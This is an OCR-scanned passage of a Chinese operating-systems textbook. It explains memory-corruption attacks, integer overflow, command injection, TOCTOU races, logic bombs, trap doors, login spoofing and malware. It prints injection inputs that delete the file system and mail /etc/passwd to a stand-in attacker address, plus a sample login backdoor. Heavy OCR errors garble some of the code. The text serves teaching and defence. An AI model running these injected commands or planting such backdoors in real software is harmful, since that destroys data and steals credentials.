果 程 序 是 SETUID 权 限 ， 攻 击 者 就 能 够 用 root 权 限 创造 一 个 Shell 程 序 。 另 一 方面 ， 例 子 当 中 固定 大 小 的 
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字符 串 数组 也 可 能 成 为 缓冲 区 溢出 攻击 的 目标 。 


9.7.3 悬垂 指针 

第 三 种 坊间 特别 流行 的 内 存 错误 攻击 技术 称 作 悬垂 指针 攻击 。 该 技术 最 简单 的 表现 很 容易 理解 ， 但 
产生 的 漏洞 却 十 分 棘手 。C 和 C++ 人 克 许 程序 使 用 malloc 调 用 来 分 配 堆 中 的 内 存 ， 它 返回 指向 新 分 配 的 内 
存 块 的 指针 。 之 后 程序 不 再 需要 它 时 ,- 便 调 用 free 来 释放 内 存 。 当 程序 在 释放 内 存 后 仍然 意外 地 使 用 该 
块 内 存 时 ， 悬 垂 指针 错误 就 会 发 生 。 考 虑 下 面 这 段 (极端 ) 歧视 老年 人 的 代码 : 

01. int*A = (int *) malloc (128); 广 给 128 位 整数 分 配 空间 */ 

02. int year_of_birth = read_user_input (); A 从 标准 输入 读 取 整数 */ 

03. if (input < 1900) { 

04. printf ("Error, year of birth should be greater than 1900 \n"); 

05. free (A); 

06. } else { 


08. /* 用 数组 A 做 一 些 有 趣 的 事情 */ 


10. } 

11... /* ESEE, LTA Ha ORE a I] */ 

12. A[0] = year_of_birth; 

这 段 代码 是 错误 的 。 不 仅 是 因为 年 龄 歧视 ， 也 因为 在 第 12 行 ， 它 给 已 经 释放 了 内 存 的 数组 A 的 元 素 
分 配 了 一 个 值 (第 5 行 )。 指 针 A 仍 然 指 向 相同 的 地 址 ， 但 是 它 不 应 该 被 使 用 。 实 际 上 ， 内 存 可 能 已 经 被 
另 一 个 缓冲 区 使 用 了 (第 11 行 )。 

问题 是 会 产生 什么 问题 ? 第 12 行 的 存储 会 更 新 已 经 不 再 为 A 所 用 的 内 存 ， 并 且 可 能 修改 了 现在 该 内 
存 中 的 数据 结构 。 一 般 来 说 ， 这 样 的 内 存 错误 不 是 什么 好 事 ， 但 如 果 是 攻击 者 用 这 样 的 方法 操纵 程序 就 
会 更 精 ， 因 为 他 可 以 在 内 存 中 放置 一 个 特定 的 堆 对 象 ， 而 该 对 象 的 第 一 个 整数 将 包含 用 户 权 限 。 这 不 容 
易 实 现 ， 但 是 存在 这 样 的 技术 ( 堆 风 水 ) 来 帮助 攻击 者 努力 实现 它 。 风 水 是 古代 中 国 为 了 吉利 而 测算 建 
筑 和 坟墓 的 方位 的 习俗 ， 现在， 我 们 用 它 来 测算 堆 中 的 内 存 。 如 果 数 字 风 水 大 师 成 功 ， 他 就 能 将 权限 等 
级 设置 成 任意 值 。 


9.7.4 空 指针 间接 引用 攻击 

第 3 章 中 ， 我 们 详细 讨论 了 内 存 管理 。 你 也 许 还 记得 现代 操作 系统 如 何 虚 拟 化 内 核 和 用 户 进程 的 地 
址 空间 。 在 一 个 程序 访问 内 存 地 址 之 前 ，MMU 将 虚拟 地 址 通过 页 表 的 方式 转换 为 物理 地 址 。 没 有 被 映 
射 的 页 将 不 能 被 访问 。 假 设 内 核 地 址 空间 和 一 个 用 户 进程 的 地 址 空间 完全 不 同 看 起 来 是 符合 逻辑 的 ， 但 
是 实际 上 不 总 是 这 样 的 。 例 如 在 Linux 中 ， 内 核 简 单 地 映射 到 每 个 进程 的 地 址 空间 并 且 当 内 核 开 始 执行 
系统 调用 时 ， 它 将 在 进程 地 址 空间 运行 。 在 32 位 系统 中 ， 用 户 空间 占 3GB 的 低位 地 址 空间 ， 内 核 占 1G 的 
高 位 地 址 空间 。 这 样 组 合 的 原因 在 于 地 址 空间 中 相互 转换 的 代价 较 高 。 

通常 这 样 安排 不 会 造成 任何 问题 。 但 是 当 攻击 者 使 用 内 核 调用 用 户 空间 的 函数 时 ,情况 就 有 所 不 同 。 
内 核 为 什么 要 做 这 件 事 ? 显然 它 不 该 这 样 做 。 然 而 记得 我 们 在 讨论 漏洞 。 一 个 错误 的 内 核 可 能 在 罕见 和 
不 幸 的 条 件 下 意外 地 应 用 一 个 空 指针 。 例 如 它 可 能 调用 一 个 还 未 进行 初始 化 的 函数 指针 。 最 近 的 几 年 里 ， 
在 Linux 内 核 中 发 现 了 几 种 这 样 的 漏洞 。 引 用 空 指针 会 导致 程序 和 系统 的 崩溃 ， 所 以 非常 危险 。 在 用 户 
进程 中 导致 程序 崩溃 就 已 经 足够 严重 ， 但 在 内 核 中 会 更 糟糕 ， 因 为 它 会 拿 下 整个 系统 。 

有 时 当 攻击 者 触发 用 户 进程 的 空 指针 引用 时 ， 仍 然 会 很 糟糕 。 在 这 种 情况 下 ， 他 可 以 随时 让 系统 崩 
种。 然而 让 系统 崩溃 并 不 会 让 你 的 黑客 朋友 满足 一 一 他 们 的 最 终 目的 是 想 看 到 一 个 shell。 

崩溃 发 生 是 因为 没有 代码 映射 到 第 0 页 。 所 以 攻击 者 可 以 使 用 特殊 的 函数 mmap 来 补救 。 使 用 mmap 
后 ， 用 户 进程 可 以 让 内 核 在 特定 的 地 址 中 映射 。 在 地 址 0 映射 之 后 ， 攻 击 者 能 够 在 该 页 中 写 入 shell 程 序 。 
最 终 ， 它 触发 空 指针 引用 ， 让 shell 程 序 以 核 权 限 执行 。 攻 击 者 们 在 互相 击 掌 。 

在 现代 内 核 中 ， 用 mmap 将 一 页 映射 到 地 址 0 已 不 再 可 能 。 即 使 这 样 ， 许 多 老 版 本 的 内 核 仍 然 可 以 做 
到 。 此 外 ， 这 种 手段 还 适用 于 有 不 同 值 的 指针 。 有 了 这 些 漏洞 ， 攻 击 者 能 够 将 自己 的 指针 加 入 内 核 并 引 
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用 。 我 们 从 这 个 漏洞 中 吸取 的 教训 是 内 核 与 用 户 空间 的 交互 可 能 在 意 想 不 到 的 地 方 出 现 ， 并 且 被 用 于 提 
升 性 能 的 优化 技术 可 能 导致 你 受到 来 自 攻击 者 的 困扰 。 


9.7.5 整数 溢出 攻击 

计算 机 在 固定 长 度 的 数字 上 做 整数 运算 ， 通 常 是 gs、16、32 或 64 位 。 如 果 相 加 或 相 乘 的 两 个 数字 的 
总 和 超过 可 以 表示 的 最 大 整数 ， 则 会 发 生 溢出 。C 程 序 不 会 捕捉 该 错误 ， 它 们 只 是 存储 和 使 用 错误 的 值 。 
特别 的 是 ， 如 果 变 量 是 有 符号 整数 ， 则 相 加 或 相 乘 两 个 正 整数 的 存储 结果 可 能 是 个 负 整 数 。 如 果 整 数 是 
无 符号 的 ， 则 结果 是 正 的 但 可 能 绕 回 。 例 如 ， 考 虑 两 个 无 符号 的 16 位 整数 ， 每 一 个 的 值 为 40000。 如 果 
它们 相 乘 并 且 将 结果 存储 在 另 一 个 无 符号 16 位 整数 中 ， 则 结果 为 4096。 显 然 结 果 是 错误 的 ， 但 是 没有 被 
探测 到 。 

这 种 没有 被 发 现 的 数字 溢出 可 能 被 利用 并 成 为 一 种 攻击 方法 。 有 具体 而 言 ， 给 程序 提供 两 个 有 效 (但 
K) 的 参数 ， 它 们 相 加 或 相 乘 的 结果 会 导致 游 出 。 例 如 一 些 图 形 程序 带 有 命令 行 参数 ， 给 出 了 图 像 文 件 
的 高 度 和 宽度 ， 可 用 于 转换 输入 图 像 的 大 小 等 目的 。 如 果 目 标 宽度 和 高 度 造成 了 强行 溢出 ， 程 序 将 会 错 
误 计 算 它 存储 图 像 所 需要 的 内 存 大 小 并 调用 malloc 来 分 配 一 个 很 小 的 缓冲 区 。 此 时 的 环境 对 于 缓冲 区 溢 
出 攻击 来 说 已 经 相当 成 熟 。 当 有 符号 正 整数 求 和 或 乘积 并 得 到 负数 的 结果 时 ， 也 有 可 能 产生 类 似 的 漏洞 。 


9.7.6 命令 注入 攻击 
另 一 个 漏洞 是 让 目标 程序 执行 命令 而 没有 意识 到 它 在 执行 命令 。 考 虑 在 某 个 点 目标 程序 需要 将 

用 户 提供 的 一 个 文件 复制 为 一 个 具有 新 文件 名 的 文件 (可 能 是 作为 原文 件 的 一 个 备份 )。 如 果 程 序 员 很 
懒 ， 不 想 专门 为 此 写 代码 ， 他 可 以 使 用 system 函 数 ， 调 用 该 函数 将 fork 出 一 个 shell 并 且 将 函数 参数 作为 
shell 命 令 参 数 。 例 如 C 代 码 

system("Is >file-list") 

fork 出 一 个 shell 并 执行 命令 

ls>file-list 


列 出 当前 目录 中 的 所 有 文件 ， 然 后 将 它们 写 入 名 为 file-list 的 文件 中 。 一 个 懒惰 的 程序 员 可 能 使 用 
图 9-25 所 示 的 代码 来 复制 文件 。 


int main(int argc, char *argv[]) 


{ 
char src[100], dst[100], cmd[205] = “cp "; [* 声明 3 个 字符 串 ”/ 
printf("Please enter name of source file: "); 请求 源 文件 */ 
gets(src); 让 从 键盘 得 到 输入 */ 
strcat(cmd, src); 广 将 src 连 接 在 cp 后 面 */ 


strcat(cmd, " "); /” 在 cmd 后 面 加 一 个 空格 */ 
printf("Please enter name of destination file: "); /* 请 求 输出 的 文件 名 */ 
gets(dst); /从 键盘 得 到 输入 */ 
strcat(cmd, dst); 
system(cmd); 执行 cp 命令 */ 

} 





图 9-25 可 能 导致 命令 注入 攻击 的 代码 


程序 所 做 的 是 请 求 用 户 输入 源 文 件 和 目标 文件 的 名 称 ， 使 用 cp 建立 一 个 命令 行 ， 然 后 调用 系统 执行 
它 。 假 设 用 户 分 别 键入 ABC 和 XYZ， 则 shell 将 执行 的 命令 是 

cp abc xyz 
这 确实 复制 了 文件 。 

不 幸 的 是 ， 这 段 代 码 打 开 了 一 个 巨大 的 安全 漏洞， 其 所 使 用 的 技术 被 称 为 命令 注入 。 假 设 用 户 键入 
abe 和 xyz; rm -rf /。 现 在 的 命令 行 是 : 


cp abc xyz; rm-rf / 


首先 复制 文件 ， 然 后 尝试 递归 删除 整个 文件 系统 中 的 每 个 文件 和 每 个 目录 。 如 果 程 序 运行 在 超级 用 户 权 
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限 ， 那 么 它 很 有 可 能 成 功 。 当 然 ， 问 题 是 分 号 之 后 的 一 切 都 会 被 执行 为 shell 命 令 。 
第 二 个 参数 的 另 一 个 例子 可 能 是 “xyz; mail snooper@bad- guys.com </etc/passwd”， 这 将 生成 
cp abc xyz; mail snooper@bad-guys.com </etc/passwd 


从 而 将 密码 文件 发 送 到 未 知 的 和 不 受信 任 的 地 址 。 


9.7.7 检查 时 间 / 使 用 时 间 攻 击 

这 一 节 的 最 后 一 种 攻击 有 着 完全 不 同 的 性 质 ， 它 与 内 存 损 坏 或 命令 注入 无 关 。 相 反 ， 它 利用 了 竞争 
条 件 。 和 以 往 一 样 ， 最 好 用 一 个 例子 加 以 说 明 。 考 虑 下 面 的 代码 : 

int fd; 

if (access ("./my_document", W_OK) != 0) { 

exit (1); 

fd = open ("./my_document", O_WRONLY) 

write(fd, user_input, sizeof (user_input)); 

我 们 假设 程序 有 SETUID root 权 限 而 且 攻击 者 想 利用 其 特权 写 入 密码 文件 。 当 然 ， 他 对 密码 文件 设 
有 写 权限 ， 但 是 让 我 们 看 看 代码 。 我 们 注意 到 的 第 一 件 事 就 是 SETUID 程 序 不 应 该 写 入 密码 文件 ， 它 只 
想 写 人 当前 工作 目录 中 一 个 文件 名 为 my_document 的 文件 中 。 然 而 ， 尽 管用 户 可 能 在 当前 的 工作 目录 中 
有 这 个 文件 ， 但 这 并 不 意味 着 他 确实 对 这 个 文件 有 写 权 限 。 例 如 ， 文 件 可 能 是 另 一 个 不 属于 用 户 的 文件 
的 符号 链接 ， 例 如 密码 文件 。 

为 了 防止 这 种 情况 ， 程 序 执行 检查 ， 以 确保 用 户 通过 访问 系统 调用 来 对 文件 进行 写 访问 。 调 用 检查 
实际 的 文件 (例如 ， 如 果 它 是 一 个 符号 链接 ， 则 将 被 引用 )， 如 果 允 许 一 个 访问 请 求 则 返回 9?， 否 则 返回 
一 个 错误 值 一 1。 此 外 ， 检 查 是 使 用 调用 进程 的 真实 UID 进 行 的 ， 而 不 是 表层 UID (否则 一 个 SETUID 进 
程 总 是 有 访问 )。 只 有 当 检 查 成 功 后， 程序 才 会 打开 文件 并 写 入 用 户 输入 。 

程序 看 起 来 是 安全 的 ， 但 事实 并 非 如 此 。 问 题 在 于 访问 权限 的 时 间 和 使 用 特权 的 时 间 是 不 一 样 的 。 
假设 在 访问 检查 后 的 一 秒 钟 内 ， 攻 击 者 设法 创建 一 个 与 文件 名 相同 的 符号 链接 到 密码 文件 。 在 这 种 情况 
下 将 打开 错误 的 文件 ， 并 最 终 在 密码 文件 写 入 攻击 者 的 数据 。 为 了 摆脱 它 ， 攻 击 者 必须 与 程序 竞争 ， 让 
程序 在 正确 的 时 间 创 建 符号 链接 。 

这 种 攻击 被 称 为 检查 时 间 / 使 用 时 间 (TOCTOU) 攻击 。 另 一 种 针对 这 种 特殊 攻击 方式 的 分 析 是 发 
现 access 系 统 调用 并 不 安全 。 先 打开 文件 ， 然 后 检查 使 用 文件 描述 符 的 权限 而 不 是 使 用 fstat 函 数 将 会 更 
好 。 文 件 描述 符 是 安全 的 ， 因 为 它们 不 会 被 攻击 者 的 fstat 和 write 调用 修改 。 这 表明 ， 为 操作 系统 设计 一 
个 良好 的 API 是 非常 重要 而 且 相 当 困难 的 。 在 本 例 中 ， 设 计 者 错 了 。 


9.8 内 部 攻击 


前 几 节 对 于 用 户 认 证 工作 原理 的 一 些 细节 问题 已 经 有 所 讨论 。 不 幸 的 是 ， 阻 止 不 速 之 客 登 录 系 统 仅 
仅 是 众多 安全 问题 中 的 一 个 。 另 一 个 完全 不 同 的 领域 可 以 被 定义 为 “内 部 攻击 ”(inside jobs), ABB 
击 由 一 些 公司 的 编程 人 员 或 使 用 这 些 受 保护 的 计算 机 、 编 制 核心 软件 的 员工 实施 。 来 自 内 部 攻击 与 外 部 
攻击 的 区 别 在 于 ， 内 部 攻击 者 拥有 外 部 人 员 所 不 具备 的 专业 知识 和 访问 权限 。 下 面 我 们 将 给 出 一 些 内 部 
攻击 的 例子 ， 这 些 攻 击 方式 曾经 非常 频繁 地 出 现在 公司 中 。 根 据 攻 击 者 、 被 攻击 者 以 及 攻击 者 想 要 达到 
的 目的 这 三 方面 的 不 同 ， 每 种 攻击 都 具有 不 同 的 特点 。 


9.8.1 逻辑 炸弹 

在 软件 外 包 盛 行 的 时 代 ， 程 序 员 总 是 很 担心 他 们 会 失去 工作 ， 有 时 候 他 们 甚至 会 采取 某 些 措施 来 减轻 这 
种 担心 。 对 于 感受 到 失业 威胁 的 程序 员 ， 编 写 逻 辑 炸 弹 (logic bomb) 就 成 为 了 一 种 策略 。 这 一 装置 是 某 些 公 
司 程序 员 (当前 被 雇用 的 ) 写 的 程序 代码 ， 并 被 秘密 地 放 入 产品 的 操作 系统 中 。 只 要 程序 员 每 天 输入 密码 ， 
产品 就 相安 无 事 。 但 是 一 旦 程序 员 被 突然 解雇 并 毫 无 警告 地 被 要 求 离开 时 ， 第 二 天 (或 第 二 周 ) 逻辑 炸弹 就 
会 因 得 不 到 密码 而 发 作 。 当 然 也 可 以 在 逻辑 炸弹 里 设置 多 个 变量 。 一 个 非常 有 名 的 例子 是 : 逻辑 炸弹 每 天 核 
对 薪水 册 。 如 果 某 程序 员 的 工 号 没有 在 连续 两 个 发 薪 日 中 出 现 ， 有 还 辑 炸弹 就 发 作 了 (Spafford A, 1989), 

逻辑 炸弹 发 作 时 可 能 会 擦 去 磁盘 ， 随 机 删除 文件 ， 对 核心 程序 做 难以 发 现 的 改动 ， 或 者 对 原始 文件 
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进行 加 密 。 在 后 面 的 例子 中 ， 公 司 对 是 否 要 叫 警察 带 走 放置 逻辑 炸弹 的 员工 进退 两 难 (报警 存在 着 导致 
数 月 后 对 该 员工 宣判 有 罪 的 可 能 ， 但 却 无 法 恢复 丢失 的 文件 )。 或 者 届 服 该 员工 对 公司 的 敲诈 ， 将 其 重 
新 雇用 为 “顾问 ”来 避免 如 同 天 文 数字 般 的 补救 ， 并 依 此 作为 解决 问题 的 交换 条 件 (公司 也 同时 期 望 他 
\ 会 再 放置 新 的 逻辑 炸弹 ) 。 

在 很 多 有 记录 的 案例 中 ， 病 毒 向 被 其 感染 的 计算 机 中 植 入 逻辑 炸弹 。 一 般 情况 下 ， 这 些 逻 辑 炸弹 被 
设计 为 在 未 来 的 某 个 时 间 “ 爆 炸 "”。 然 而 ， 由 于 程序 员 无 法 预知 那 一 台 计 算 机 将 会 被 攻击 ， 因 此 逻辑 炸 
弹 无 法 用 于 保护 自己 不 失业 ， 也 无 法 用 户 勒 索 。 这 些 逻 辑 炸弹 通常 会 被 设 定 为 在 政治 上 有 重要 意义 的 日 
子 爆炸 ， 因 此 它们 也 称 作 时 间 炸 弹 (time bomb), 


9.8.2 后 门 陷阱 

另 一 个 由 内 部 人 员 造 成 的 安全 漏洞 是 后 门 陷阱 (trap door)。 这 一 问题 是 由 系统 程序 员 跳 过 一 些 常见 的 检 
测 并 插入 一 段 代码 造成 的 。 如 程序 员 可 以 在 登录 程序 中 插入 一 小 段 代码 ， 让 所 有 使 用 “zzzzz” 登 录 名 的 用 户 
成 功 登 录 而 无 论 密 码 文件 中 的 密码 是 什么 。 正 常 的 程序 代码 如 图 9-26a 所 示 。 改 成 后 门 陷阱 程序 的 代码 如 图 9- 
26b 所 示 。stremp 这 行 代码 的 调用 是 为 了 判断 登录 名 是 否 为 “zzzzz”"。 如 果 是 ， 则 无 论 输入 了 什么 密码 都 可 以 
登录 。 如 果 后 门 陷阱 被 程序 员 放 入 到 计算 机 生产 商 的 产品 中 并 漂 洋 过 海 ， 那 么 程序 员 日 后 就 可 以 任意 登录 到 
这 家 公司 生产 的 计算 机 上 ， 而 无 论 谁 拥有 它 或 密码 是 什么 。 后 门 陷阱 程序 的 实质 是 它 跳 过 了 正常 的 认证 过 程 。 


while (TRUE) { 
printf(“login: "); 
get_string(name); 
disable_echoing( ); 
printf("password: “); 
get_string(password); 
enable_echoing( ); 
v = check_validity(name, password); 
if (v) break; 


while (TRUE) { 
printf("login: "); 
get_string(name); 
disable_echoing( ); 


printf("password: "); 
get_string(password); 

enable_echoing( ); 

v = check_validity(name, password); 

if (v Il stremp(name, “zzzzz") == 0) break; 


} 
execute_shell(name); 


} 
execute_shell(name); 





a) b) 
图 9-26 a) 正常 的 代码 ，b) 插入 了 后 门 陷阱 的 代码 


对 公司 来 说 ， 防 止 后 门 的 一 个 方法 是 把 代码 审查 (code review) 作为 标准 惯例 来 执行 。 通 过 这 一 技 
R, 一 旦 程序 员 完 成 对 某 个 模块 的 编写 和 测试 后 ， 该 模块 被 放 入 代码 数据 库 中 进行 检验 。 开 发 小 组 里 的 
所 有 程序 员 周 期 性 地 聚会 ， 每 个 人 在 小 组 面前 向 大 家 解释 每 行 代 码 的 含义 。 这 样 做 不 仅 增加 了 找 出 后 门 
代码 的 机 会 ， 而 且 增 加 了 大 家 的 责任 感 ， 被 抓 出 来 的 程序 员 也 知道 这 样 做 会 损害 自己 的 职业 生涯 。 如 果 
该 建议 遭 到 了 太 多 的 反对 ， 那 么 让 两 个 程序 员 相 互 检查 代码 也 是 一 个 可 行 的 方法 。 


9.8.3 登录 欺骗 

这 种 内 部 攻击 的 实施 者 是 系统 的 合法 用 户 ， 然 而 这 些 合法 用 户 却 试图 通过 登录 欺骗 的 手段 获取 他 人 
的 密码 。 这 种 攻击 通常 发 生 在 一 个 具有 大 量 多 用 户 公用 计算 机 的 局 域 网 内 。 很 多 大 学 就 有 可 以 供 学 生 使 
用 的 机 房 ， 学 生 可 以 在 任意 一 台 计 算 机 上 进行 登录 。 登 录 欺 骗 
(login spoofing)。 它 是 这 样 工 作 的 : 通常 当 没 有 人 登录 到 UNIX 终 
端 或 局 域 网 上 的 工作 站 时 ， 会 显示 如 图 9-27a 所 示 的 屏幕 。 当 用 户 
坐 下 来 输入 登录 名 后 ， 系 统 会 要 求 输入 密码 。 如 果 密 码 正确 ， 用 户 
就 可 以 登录 并 启动 shell (也 有 可 能 是 GUI) 程序 。 

现在 我 们 来 看 一 看 这 一 情节 。 一 个 恶意 的 用 户 Mal 写 了 一 个 程 图 9-27 a) 正确 的 登录 屏幕 ，b) 假 
序 可 以 显示 如 图 9-27b 所 示 的 图 像 。 除 了 内 部 没有 运行 登录 程序 外 ， 冒 的 登录 屏幕 
它 看 上 去 和 9-27a 惊 人 的 相似 ， 这 不 过 是 骗 人 。 现 在 Mal 启 动 了 他 的 
程序 ， 便 可 以 钱 在 远 处 看 好 戏 了 。 当 用 户 坐 下 来 输入 登录 名 后 ， 程 序 要 求 输入 密码 并 屏蔽 了 响应 。 随 后 ， 
登录 名 和 密码 后 被 写 入 文件 并 发 出 信号 要 求 系统 结束 shell 程 序 。 这 使 得 Mal 能 够 正常 退出 登录 并 触发 真正 
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的 登录 程序 ， 如 图 9-23a 所 示 。 好 像 是 用 户 出 现 了 一 个 拼写 错误 并 要 求 再 次 登录 ， 这 时 真正 的 登录 程序 开 
始 工作 了 。 但 与 此 同时 Mal 又 得 到 了 另 一 对 组 合 (登录 名 和 密码 )。 通 过 在 多 个 终端 上 进行 登录 欺骗 ， 入 
侵 者 可 收集 到 多 个 密码 。 

防止 登录 欺骗 的 唯一 实用 的 办 法 是 将 登录 序列 与 用 户 程序 不 能 捕捉 的 键 组 合 起 来 。Windows 为 此 目 
的 采用 了 Ctrl-AltrDel。 如 果 用 户 坐 在 终端 前 开始 按 Ctrl-AlttDel， 当 前 用 户 就 会 被 注销 并 启动 新 的 登录 程 
序 。 没 有 任何 办 法 可 以 跳 过 这 一 步 。 


9.9 恶意 软件 

在 2000 年 之 前 出 生 的 年 轻 人 有 时 候 为 了 打发 无 聊 的 时 间 ， 会 编写 一 些 恶意 软件 发 布 到 网 络 上 ， 当 然 
他 们 的 目的 只 是 为 了 娱乐 。 这 样 的 软件 (包括 木马 、 病 毒 和 蠕虫 ) 在 世界 上 快速 地 传播 开 来 ， 并 被 统一 
称 为 恶意 软件 (malware) 。 当 报道 上 强调 某 个 恶意 软件 造成 了 数 百 万 美元 的 损失 ， 或 者 无 数 人 丢失 了 他 
们 宝贵 的 数据 ， 恶 意 软 件 的 作者 会 惊讶 于 自己 的 编程 技艺 竟然 能 产生 如 此 大 的 影响 。 然 而 对 于 他 们 来 说 ， 
这 只 不 过 是 一 次 恶作剧 而 已 ， 并 不 涉及 任何 利益 关系 。 

然而 这 样 天真 的 时 代 已 经 过 去 了 ， 现 在 的 恶意 软件 都 是 由 组 织 严 密 的 犯罪 集团 编写 的 ， 他 们 所 做 的 
一 切 只 是 为 了 钱 ， 而 且 并 不 希望 自己 的 事情 被 媒体 报道 。 绝 大 多 数 这 样 的 恶意 软件 的 设计 目标 都 是 “ 传 
播 越 快 越 好 ， 苑 围 越 广 越 好 ”" 。 当 一 台 机 器 被 感染 ， 恶 意 软件 被 安装 ， 并 且 向 在 世界 某 地 的 控制 者 机 器 
报告 该 机 器 的 地 址 。 用 于 控制 的 机 器 通常 都 被 设置 在 一 些 欠 发 达 的 或 法 制 宽 松 的 国家 。 在 被 感染 的 机 器 
中 通常 都 会 安装 一 个 后 门 程序 (backdoor)， 以 便 犯罪 者 可 以 随时 向 该 机 器 发 出 指令 ， 以 方便 地 控制 该 
机 器 。 以 这 种 方式 被 控制 的 机 器 叫 作 僵尸 机 器 (zombie) ， 而 所 有 被 控制 的 机 器 合 起 来 称 作 僵尸 网 络 
(botnet， 是 robot network 的 缩写 ) 。 

控制 一 个 僵尸 网 络 的 罪犯 可 能 出 于 恶意 的 目的 (通常 是 商业 目的 ) 将 这 个 网 络 租借 出 去 。 最 通常 的 
一 种 是 利用 该 网 络 发 送 商 业 垃 圾 邮件 。 当 一 次 垃圾 邮件 的 攻击 在 网 上 爆发 ， 警 方 介入 并 试图 找到 邮件 的 
来 源 ， 他 们 最 终 会 发 现 这 些 邮件 来 自 全 世界 成 千 上 万 台 计 算 机 ， 如 果 警 方 继续 深入 调查 这 些 计算 机 的 拥 
有 者 ， 他 们 将 会 看 到 从 孩子 到 老 妇 的 各 色 人 物 ， 而 其 中 不 会 有 任何 人 承认 自己 发 送 过 垃圾 邮件 。 可 见 利 
用 别人 的 机 器 从 事 犯 罪 活动 使 得 找到 幕后 黑手 成 为 一 件 困 难 的 事情 。 

安装 在 他 人 机 器 中 的 恶意 软件 还 可 以 用 于 其 他 犯罪 活动 ， 如 勒索 。 想 象 一 下 ， 一 台 机 器 中 的 恶意 软 
件 将 磁盘 中 的 所 有 文件 都 进行 了 加 密 ， 接 着 显示 如 下 信息 : 


GREETINGS FROM GENERAL ENCRYPTION! 
TO PURCHASE A DECRYPTION KEY FOR YOUR HARD DISK, PLEASE SEND $100 IN 


SMALL, UNMARKED BILLS TO BOX 2154, PANAMA CITY, PANAMA. THANK YOU. WE 
APPRECIATE YOUR BUSINESS. 
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器 (keylogger) ， 该 软件 每 隔 一 段 时 间 将 记录 的 结果 发 送 给 其 他 某 台 机 器 或 一 组 机 器 (包括 僵尸 机 器 )， 
最 终 发 送 到 罪犯 手中 。 一 些 提供 中 间接 收 和 发 送信 息 的 机 器 的 互联 网 提供 者 通常 是 罪犯 的 同伙 ， 但 调查 
他 们 同样 困难 。 

罪犯 在 上 述 过 程 中 收集 的 键盘 敲 击 信 息 中 ， 真 正 有 价值 的 是 一 些 诸 如 信用 卡 卡 号 这 样 的 信息 ， 它 可 
以 通过 正当 的 商业 途径 来 购买 东西 。 受 害 者 可 能 知道 还 款 期 才能 发 现 他 的 信用 卡 已 经 被 盗 ， 而 此 时 犯罪 
分 子 已 经 用 这 张 卡 遂 遥 度 过 了 几 天 甚至 几 个 星期 。 

为 了 防止 这 类 犯罪 ， 信 用 卡 公司 都 采取 人 工 智能 软件 检测 某 次 不 同 寻常 的 消费 行为 。 例 如 ， 如 果 一 
个 人 通常 情况 下 只 会 在 本 地 的 小 商店 中 使 用 他 的 信用 卡 ， 而 某 一 天 它 突然 预订 了 很 多 台 晶 贵 的 笔记 本 电 
脑 并 要 求 将 他 们 发 送 到 塔吉克 斯 坦 的 某 个 地 址 。 这 时 信用 卡 公 司 的 警报 会 响起 ， 员 工会 与 信用 卡 拥 有 者 
进行 联系 ， 以 确认 这 次 交易 。 当 然 犯 罪 分 子 也 知道 这 种 防御 软件 ， 因 此 他 们 会 试图 调整 自己 的 消费 习惯 ， 
并 力图 避 开 系统 的 检测 。 

在 僵尸 机 器 上 安装 的 其 他 软件 可 以 搜集 另外 一 些 有 用 的 信息 ， 这 些 信息 与 键盘 记录 其 搜集 的 信息 结 
合 起 来 ， 可 能 使 得 犯罪 分 子 从 事 更 加 广泛 的 身份 盗窃 (identity theft) 犯罪 。 罪 犯 搜集 了 一 个 人 足够 的 
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信息 ， 如 他 的 生日 、 母 亲 出 嫁 前 的 姓名 、 社 会 安全 码 、 银 行 账号 、 密 码 等 ， 因 此 可 以 成 功 地 模仿 受害 者 ， 
并 得 到 新 的 实物 文档 ， 如 替换 驾驶 执照 、 银 行 签 账 卡 (bank debit card) 、 出 生 证 明 等 。 这 些 信 息 可 能 被 
卖 给 其 他 罪犯 ， 从 而 从 事 更 多 犯罪 活动 。 

利用 恶意 软件 从 事 的 另 一 种 犯罪 是 窃取 用 户 账户 中 的 财产 ， 该 类 恶意 软件 平时 一 直 处 在 潜伏 状态 ， 
直到 用 户 正确 地 登录 到 他 的 网 络 银行 账户 中 去 ， 该 软件 立刻 发 起 一 次 快速 的 交易 ， 查 看 该 账户 有 多 少 余 
额 ， 并 将 所 有 的 钱 都 转 到 罪犯 的 账户 中 ， 这 笔 钱 接着 连续 转移 很 多 个 账户 ， 以 便 警 方 在 追踪 现金 流 走向 
的 时 候 需 要 花 很 多 天 甚至 几 个 星期 来 获得 查看 账户 的 相关 许可 。 这 种 犯罪 通常 设计 很 大 的 交易 量 ， 已 经 
不 能 视 为 青少年 的 恶作剧 了 。 

恶意 软件 不 只 会 被 有 组 织 的 犯罪 团伙 所 使 用 ， 在 工业 生产 中 同样 可 以 看 到 其 身影 。 一 个 公司 可 能 会 
向 对 手 的 工厂 中 安装 一 些 恶意 软件 ， 当 这 些 恶 意 软 件 检测 到 没有 管理 员 处 于 登录 状态 时 ， 便 会 运行 并 干 
扰 正常 的 生产 过 程 ， 降 低产 品 的 质量 ， 以 此 来 给 竞争 对 手 制造 麻烦 。 而 在 其 他 情况 下 这 类 恶意 软件 不 会 
做 任何 事情 ， 因 此 难以 被 检测 到 。 

另 一 种 恶意 软件 可 能 由 野心 勃勃 的 公司 领导 人 所 利用 ， 这 种 病毒 被 投放 在 局 域 网 中 ， 并 且 会 检测 它 
是 否 在 总 裁 的 计算 机 中 运行 ， 如 果 是 ， 则 找到 其 中 的 电子 报表 ， 并 随机 交换 两 个 单元 格 的 内 容 。 而 总 裁 
迟早 会 基于 这 份 错误 的 报表 做 出 不 正确 的 决定 ， 到 时 等 待 他 的 就 是 被 炒 鲍鱼 的 下 场 ， 成 为 一 个 无 名 之 非 。 

一 些 人 无 论 走 到 哪里 肩膀 上 都 会 有 一 个 芯片 〈 请 不 要 与 肩膀 上 的 REFID 芯 片 和 弄 混 )。 他 们 对 社会 充满 
了 或 真实 或 想象 中 的 怨恨 ， 想 要 进行 报复 。 此 时 他 们 可 能 会 选择 恶意 软件 。 很 多 现代 计算 机 将 BIOS 保 存 
在 内 存 中 ， 闪 存 可 以 在 程序 的 控制 下 被 重 写 (以便 生产 者 可 以 方便 地 修正 其 错误 ) 。 恶 意 软件 向 闪存 中 随 
机 地 写 入 垃圾 数据 ， 使 得 电脑 无 法 启动 。 如 果 闪 存在 电脑 插 槽 中， 那么 修复 这 个 问题 需要 将 电脑 打开 ， 
并 且 换 一 个 新 的 闪存 ， 如 果 闪 存 被 焊接 在 母 板 上 ， 可 能 整 块 母 板 都 可 能 作废 ， 不 得 不 买 一 块 新 的 母 板 。 

